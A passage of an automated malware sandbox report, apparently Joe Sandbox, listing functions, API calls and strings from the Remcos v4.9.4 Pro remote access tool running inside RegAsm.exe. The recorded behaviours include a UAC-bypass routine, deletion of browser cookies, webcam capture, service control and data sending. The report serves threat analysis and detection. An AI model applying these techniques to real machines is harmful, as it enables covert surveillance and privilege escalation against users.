                      • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnumInfoOpenQuerysend
                    • String ID: xUG$NG$NG$TG
                    • API String ID: 3114080316-2811732169
                    • Opcode ID: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
                    • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                    • Opcode Fuzzy Hash: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
                    • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                    Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                    • _wcslen.LIBCMT ref: 0041B763
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                    • API String ID: 37874593-122982132
                    • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                    • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                    Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                      • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                      • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                    • API String ID: 1133728706-4073444585
                    • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                    • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                    • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                    • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                    Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                    • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                    Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                    • _free.LIBCMT ref: 00450F48
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00450F53
                    • _free.LIBCMT ref: 00450F5E
                    • _free.LIBCMT ref: 00450FB2
                    • _free.LIBCMT ref: 00450FBD
                    • _free.LIBCMT ref: 00450FC8
                    • _free.LIBCMT ref: 00450FD3
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                    • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                    • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                    Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                    • int.LIBCPMT ref: 00411183
                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                    • String ID: (mG
                    • API String ID: 2536120697-4059303827
                    • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                    • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                    Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                    • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                    Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                    • CoUninitialize.OLE32 ref: 00407629
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitializeObjectUninitialize_wcslen
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                    • API String ID: 3851391207-1839356972
                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                    Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                    • GetLastError.KERNEL32 ref: 0040BAE7
                    Strings
                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                    • [Chrome Cookies not found], xrefs: 0040BB01
                    • UserProfile, xrefs: 0040BAAD
                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    • API String ID: 2018770650-304995407
                    • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                    • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                    Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocConsole.KERNEL32 ref: 0041CDA4
                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AllocOutputShowWindow
                    • String ID: Remcos v$4.9.4 Pro$CONOUT$
                    • API String ID: 2425139147-3065609815
                    • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                    • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                    • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                    • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                    Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                    Download Yara Rule
                    APIs
                    • __allrem.LIBCMT ref: 0043AC69
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                    • __allrem.LIBCMT ref: 0043AC9C
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                    • __allrem.LIBCMT ref: 0043ACD1
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1992179935-0
                    • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                    • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                    Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prologSleep
                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                    • API String ID: 3469354165-3054508432
                    • Opcode ID: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                    • Opcode Fuzzy Hash: cda6b0fbff319c628721655c4fa246e2f3a2f768a0df06d81a35272adc1baa10
                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                    Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                    • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                      • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                      • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                      • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                    • String ID:
                    • API String ID: 3950776272-0
                    • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                    • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                    • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                    • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                    Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe
                    • String ID:
                    • API String ID: 4189289331-0
                    • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                    • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                    Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                    Download Yara Rule
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                    • String ID:
                    • API String ID: 493672254-0
                    • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                    • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                    • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                    • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                    Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                    • _free.LIBCMT ref: 0044824C
                    • _free.LIBCMT ref: 00448274
                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                    • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                    • _abort.LIBCMT ref: 00448293
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                    • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                    • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                    • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                    Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                    Download Yara Rule
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                    • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                    • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                    • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                    Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                    Download Yara Rule
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                    • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                    • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                    • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                    Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                    Download Yara Rule
                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                    • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                    • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                    • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                    Function 00443435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                    • _free.LIBCMT ref: 00443540
                    • _free.LIBCMT ref: 0044354A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: 82K$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    • API String ID: 2506810119-3001362726
                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                    Function 00443A33 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .P
                    • API String ID: 0-2220739652
                    • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                    • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
